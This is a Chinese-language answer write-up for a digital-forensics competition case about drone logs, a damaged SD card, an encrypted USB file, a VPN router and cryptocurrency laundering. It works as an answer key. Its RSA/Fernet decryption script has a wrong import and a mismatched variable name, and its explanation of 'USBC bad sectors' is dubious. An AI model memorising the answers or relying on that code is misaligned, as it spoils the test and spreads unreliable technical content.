可以看到这天飞行的大致经纬度 是114.119986E 22.281744N 直接在地图上进行搜索 发现靠近西环
86
[单选题] 王景浩于2022年8月26日试飞无人机的总飞行时间 (Total Flight Time) 多久? (2分)
A. 6分58秒
B. 8分10秒
C. 9分6秒
D. 11分1秒
E. 15分33秒
在物联取证大师处找到时间线 框选出8月26日主要的飞行时间段 在查看图表 从图表中看到8月26日总飞行时间差不多在9分钟左右(注意这个飞行时间是飞起来的时间 没飞起来不算 所以要看横轴以上的时间)
87
[多选题] 王景浩用 iPhone XR 拍了一张照片'IMG_0012.HEIC',那照片什么地方曾被修改? (3分)
A. 拍摄时间
B. 经纬度
C. 时区
D. 档案名称
E. 拍摄装备
AB
首先在火眼中找到目标照片 查看照片属性 发现其和在火眼中看到的日期不一样
88
[填空题] 承上题,那张照片修改后的经纬度是什么? (不要输入答案中的 '.',将经纬度合并回答。 如 22.2846135 114.1739116,需回答 2228461351141739116) (3分)
王景浩SD卡
96
[填空题] 王景浩 SD 记忆卡 (SD Memory Card) 的储存容量有多少个字节 (Byte) ? (以阿拉伯数字回答) (1分)
8004304896
97
[单选题] 检视记忆卡上硬盘分区表 (Partition Table) 资讯,记忆卡共有多少个分区 (Partition) ? (1分)
A. 1
B. 2
C. 3
D. 4
E. 0
B
98
[单选题] 检视记忆卡上硬盘分区表资讯,第二个分区的分区代码 (Partition Code) 是什么? (1分)
A. 07
B. AF
C. 0C
D. 2B
E. 01
A
99
[多选题] 记忆卡的档案不能被读取,记忆卡受损的原因包括? (2分)
A. 目录项结构 (Directory Entry) 受损
B. 启动扇区表 (Master Boot Record) 受损
C. 文件分配表 (File Allocation Table - FAT) 受损
D. 引导扇区 (Boot Sector) 受损
E. 以上各项皆是
AB
还是使用x-ways挂载磁盘进行分析打开分区1进行查看 发现很多文件都产生了USBc坏道
USBC坏道是指USB存储设备中出现的坏道,这些坏道可能会导致数据无法读取或写入。USBC坏道的原因可能包括设备老化、频繁插拔、电压不稳定等。解决USBC坏道的方法包括使用磁盘检测工具扫描和修复坏道、更换USB存储设备等。
但是引导扇区和FAT是没有损坏的 所以选择AB
100
[填空题] 承上题,通过分析及手动恢复还原,记忆卡里有多少个出錯的情况出现? (以阿拉伯数字回答) (3分)
8
查看出现USBc坏道的部分即可
101
[多选题] 记忆卡第一个文件系统 (File System) 中有一个图片档案,它的SHA-256哈希值是 ‘F7E003781456D2E01CFE0EB46988D5BB433ADF9841164BBB90BAC67C0C9B21AF’。该档案显示了哪些影像? (2分)
A. 人
B. 山
C. 汽车
D. 交通灯
E. 天空
BE
计算全部图片的哈希在找到目标哈希值对应的图片即可
102
[单选题] 检视记忆卡的数据,在2022年10月9日约中午12时5分至12时15分之间的录像 (Video) 中,曾经出现哪一个IP地址? (2分)
A. 61.238.217.108
B. 155.137.190.123
C. 192.168.1.66
D. 185.200.100.242
E. 213.104.156.111
D
103
[填空题] 恢复还原后的记忆卡中,第二个文件系统显示有多少个空闲簇 (Free Cluster)? (以阿拉伯数字回答) (2分)
104
[填空题] 记忆卡第一个文件系统中有一个视频档,它的SHA-256哈希值是 ‘847E1E5FEF64B49C8D689DC3537D619B87666619A7C1EF0CC821153641847C19’,这个视频的档数据存在文件系统 (File System) 的最后的簇号 (Last Cluster Number) 是什么? (以阿拉伯数字回答) (2分)
105
[单选题] 尝试分析记忆卡数据結構受损的原因,通过合适的方法把数据恢复到原本没有出错的状况,记忆卡的SHA-256哈希值是什么? (3分)
A. E63DF0… …8627D3
B. 3FD99E… …17B6DE
C. 3BADAA… …666A8F
D. BBB211… …E00710
E. AA9E81… …2C04FE
王景浩记忆棒
17
[单选题] 王景浩的USB记忆棒里有一个 ‘Data’ 文件夹 (Folder),它存有哪一种类型的密钥文件? (1分)
A. pem
B. cer
C. crt
D. key
E. 以上皆非
A
是rsa的 所以是pem类型的密钥文件
18
[多选题] 承上题,‘Data’ 文件夹里有一个被加密了的档案,它是被哪一种加密方法加密? (2分)
A. Symmetric
B. PGP
C. Twofish
D. RSA
E. Triple DES
AD
在King_Ho_USB.E01/KingH00/Data/Notes有有关加密解密算法和密钥的文件 使用了rsa和Fernet(就是对称加密算法,即Symmetric)
19
[单选题] 尝试将档案解密,该档案属于哪一个类型 (File type)? (2分)
A. exe
B. ods
C. rtf
D. sql
E. 以上皆非
D
参考上面的Decryption写一个解密脚本
是仿照这个师傅写的 22美亚杯团体赛
import rsa
from cryptography import Fernet
with open('P1','rb') as f1:
a = f1.read()
k = rsa.PrivateKey.load_pkcs1(a)
with open("minecraft.exe","rb") as ef:
V2 = ef.read(128)
V3 = ef.read()
decrypted_key = rsa.decrypt(V2,K)
cipher = Fernet(decrypted_key)
decrypted_file=cipher.decrypt(V3)
with open("decrypted_file.txt","wb") as fw:
fw.write(decrypted_file)
运行解密 打开是一个sql备份文件
20
[多选题] 承上题,找出以下哪一个名字出现在该档案里? (3分)
A. Armand To
B. Adam Smasher
C. Beverly Kot
D. Huma Chan
E. 以上皆非
AC
朗尼草莓计算机
草莓计算机只有一个bin 只能手搓
89
[单选题] 朗尼草莓 (Raspberry) 计算机操作系统的主机名称 (hostname) 是什么? (1分)
A. OpenWrt
B. admin
C. root
D. AsusRt
E. DDwrt
A
在upper\etc\config中 找到system文件
90
[多选题] 以下哪项对于朗尼草莓计算机操作系统的描述是正确的? (2分)
A. LAN地址是 192.168.1.24
B. 提供点对点隧道协议 (Point-to-Point Tunneling Protocol - PPTP) VPN服务
C. WIFI登录密码为’OpenWrt’
D. 提供网络时间协议 (NTP) 服务
E. 时区设置相等于UTC+8
AE
C选项 在\upper\etc\config\wireless 密码是59814785
A选项 在\upper\etc\config\network ip地址是192.168.1.24
B选项 不是用的p2p服务 是ssl服务
E和B选项也在\upper\etc\config\system HKT-8就是UTC+8 有ntp服务 但是没开启
91
[多选题] 承上题,‘VPN’ 服务器的IP地址及端口 (Port) 是什么? (2分)
A. IP地址 61.238.217.108
B. IP地址 192.168.8.1
C. IP地址 103.10.12.106
D. 端口 33248
E. 端口 1194
F. 端口 1701
AE
查看openvpn的配置 在\upper\etc\openvpn\jpVPN.auth中
92
[填空题] 朗尼草莓计算机操作系统设定了一个档案来储存系统的 ‘log_file’ ,档案名称是什么? (不要输入 ‘.’,以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (2分)
SYSlog
还是查看刚刚的系统配置文件
93
[单选题] 承上题,检视上述的档案,当中有几个IP地址曾经成功登录这个系统的 ‘VPN’ 服务? (3分)
A. 1
B. 2
C. 3
D. 4
E. 0
B
直接导出刚刚的SYSlog 放到notepad++中进行分析 搜索password auth succeeded
94
[单选题] 承上题,检视上述的档案,当中有几个IP地址曾经尝试以 ‘root’ 登入装置但因密码错误而不成功? (2分)
A. 2
B. 4
C. 5
D. 6
E. 8
D
95
[填空题] 根据装置的过往记录,‘log_file’ 是设在 ‘usr/rooney/’ 的哪个已被删除的子文件夹里 (Sub Directory)? (以大写英文回答) (3分)
RECORD
这个路径在刚刚92题已经知道了
朗尼计算机+手机
106
[单选题] 朗尼的计算机有什么软件可以创建比特币钱包 (Bitcoin Wallet)? (1分)
A. MetaMask
B. Electrum
C. Trezor
D. 以上皆非
B
107
[填空题] 朗尼通过比特币替王景浩清洗黑钱,分析朗尼的计算机及手机,朗尼收取王景浩黑钱的比特币地址 (Bitcoin Address) 是什么? (以大写英文及阿拉伯数字回答) (1分)
bc1q0r0l3lh63wy865cd560kn3uhjqrwggvty4zj8n
108
[单选题] 朗尼收取王景浩多少比特币作为清洗黑钱的费用? (1分)
A. 1%
B. 4%
C. 7%
D. 10%
E. 15%
D
查看聊天记录可得
109
[单选题] 朗尼的计算机里有一个没被加密的比特币钱包,它的回复种子 (Recovery Seed) 不包含哪一个英文字? (1分)
A. oppose
B. area
C. twice
D. roast
D
110
[单选题] 朗尼的计算机里有多少个加密了 (Encrypted) 的比特币钱包? (1分)
A. 1
B. 2
C. 3
D. 4
E. 5
E
111
[单选题] 朗尼将加密了的比特币钱包的密码存在他计算机的一个档案里,这个档案的副档名是什么? (以大写英文及阿拉伯数字回答) (3分)
A. DMG
B. PDF
C. ASD
D. ZIP
E. PNG
C
一个一个搜 找到asd的时候 找到一个儲存自動回復文件1.asd 将其提取出来 将后缀名改为.doc 看到密码
112
[单选题] 朗尼在手机里有一个加密了的比特币钱包,他采用什么应用程序把该钱包里的黑钱转换成另一种加密货币? (2分)
A. Safepal
B. Metamask
C. Changelly
D. Opensea
C
在手机中找到一张图片
113
[单选题] 承上题,这次转换加密货币的日期和时间是什么? (以时区UTC+8回答) (2分)
A. 2022-10-07 10:29时
B. 2022-10-07 11:06时
C. 2022-10-07 11:07时
D. 2022-10-07 13:54时
D
要找交易完成的时间 也是找到图片
114
[单选题]朗尼在计算机里采用什么浏览器 (Browser) 及在什么日期时间在他的计算机安装 ‘MetaMask’ ? (以时区UTC+8回答) (1分)
A. Chrome 2022-08-25 12:35时
B. Chrome 2022-10-07 14:29时
C. Firefox 2022-08-25 12:35时
D. Firefox 2022-10-07 14:29时
C
朗尼计算机中没有火狐浏览器只有谷歌浏览器
搜索可得 MetaMask在谷歌浏览器中是一款插件
在谷歌浏览器中查找历史记录 可以看到安装时间是8-25 12:35
115
[单选题] 朗尼在计算机里所创建的非同质化通证 (Non-Fungible Token - NFT) 使用哪一个种区块链 (Blockchain) 技术? (1分)
A. Ethereum
B. Polygon
C. Solana
D. Arbitrum
E. Klaytn
A
在截图中可以看到 使用的区块链技术是Ethereum
116
[单选题] 朗尼在什么日期时间把计算机中创建的非同质化通证 (NFT) 放售? (以时区UTC+8回答) (2分)
A. 2022-10-07 14:47时
B. 2022-10-07 14:49时
C. 2022-10-07 14:52时
D. 2022-10-07 14:54时
B
我们知道朗尼是在计算机的谷歌浏览器上使用opensea网站进行虚拟币交易的 直接找历史记录
117
[多选题] 朗尼的手机里,有什么应用程序与将黑钱 (比特币) 转换成另一加密货币的地址有关? (2分)
A. Metamask
B. Opensea
C. Safepal
D. YouTube
B
图片中显示的网址上是opensea
118
[单选题] 朗尼的手机里,于2022-10-07,15:07时至15:08时做过什么动作? (以时区UTC+8回答) (2分)
A. 登录 ‘Metamask’
B. 登录 ‘Opensea’
C. 屏幕截图 (Screen Capture)
D. 登录 ‘YouTube’
在时间线中进行过滤 最后只能看到Screenshot的记录
119
[多选题] 承上题,从这个动作中能找到什么资讯? (1分)
A. Opensea.io
B. Ethereum Main Network
C. Your purchase is complete
D. Subtotal = 0.0253 ETH
E. Good Luck
ABCD
118是屏幕截图 预览看到是一张交易记录截图 内容包含ABCD
120
[填空题] 在朗尼的计算机旁找到 ‘MetaMask’ 的密码是 ‘opensea741’,找出朗尼计算机里的 ‘MetaMask’ 中有多少加密货币余额? (不要输入 ‘.’,以阿拉伯数字回答,如 0.137 需回答 0137) (2分)
00247
需要仿真计算机 由114题得知 MetaMask是下载在朗尼计算机谷歌浏览器中的一款插件
输入密码登陆
121
[填空题] 朗尼的计算机曾用什么电邮地址登录电邮帐号? (不要输入答案中的 ‘@’ 及 ‘.’,以大写英文及阿拉伯数字回答,如 name@mail.com,需回答 NAMEMAILCOM) (1分)
ROONEYCHAN19830801GMAILCOM
122
[填空题] 什么电邮账号曾接收过上述电邮地址发送的电邮?(不要输入答案中的 ‘@’ 及 ‘.’,以大写英文及阿拉伯数字回答,如 name@mail.com,需回答 NAMEMAILCOM) (1分)
KINGHOO0W0GMAILCOM
123
[多选题]承上题,上述的电邮附件包含哪些类型的档案? (3分)
A. pdf
B. doc
C. png
D. txt
E. jpg
DE
这个附件是Recovery seed.zip 直接导出 解压之后是两个文件
但是解压出来的两个文件和压缩包的大小并不匹配 使用winrar进行修复 再次进行解压 发现还有一个jpg文件
124
[填空题] 上述电邮附件里的文件,被遮蔽的英文单字是什么? (以大写英文回答) (3分)
teach
倒数三四位看起来是ea
在仿真起 在计算机中找到字典C:\Program Files(x86)\Electrum\electrum\wordlist 搜索each 发现只有beach和teach
分别尝试使用这两个种子去恢复钱包
125
[填空题]根据上述电邮附件里找到的回复种子 (Recovery Seed),计算朗尼在 ‘MetaMask’ 使用的以太币 (Ethereum) 地址。 (提示: BIP-44 derivation path = m/44’/60’/0’/0/0) (以大写英文及阿拉伯数字回答) (3分)
0X2AAEAB9592B7A9CE6355ED19D048F86F5EA5D819
这题其实直接使用第120题给的MetaMask插件登陆密码 就可以看到使用的以太币地址
1.
[填空题]在朗尼手机于2022年9月30日的 'WhatsApp' 对话里,有一段音讯 (Voice Message) 提到王景浩会给朗尼现金多少作为租用 'VPN' 的租金? (以阿拉伯数字回答) (3分)
3000
这是一段逆向音频 找个在线网站逆回来就好了
126.
[单选题]在2022年9月28日18时51分 (UTC+8),朗尼曾经在手机用WhatsApp与王景浩对话,语句 [有灯,风扇经常在转],回复这句话的相关语句是什么? (1分)
A. 你有推介吗?
B. 我之前放在你家的机械运作正常吗?
C. 有灯号风扇有转动?
D. 帅吗?
C
127.
[单选题]朗尼通过手机相约王景浩于10月15日到哪一个地区食晚饭? (1分)
A. 荃湾
B. 湾仔
C. 九龙城
D. 九龙塘
A
128.
[填空题]朗尼手机的 'WhatsApp' 号码是什么? ( 号码 ) @s.whatsapp.net? (以阿拉伯数字回答) 85259814785(1分)
85259814785
129.
[多选题]朗尼的手机曾连接以下哪一个WIFI网络? (2分)
A. taiiphone
B. rooneyhome
C. Function Room
D. TP-Link
AC
130.
[单选题]朗尼的手机曾连接WIFI [SSID: faifai], 它的登录密码是什么 ? (2分)
A. abcd5678
B. aaaa0000
C. rooney111
D. rdfu1234
D
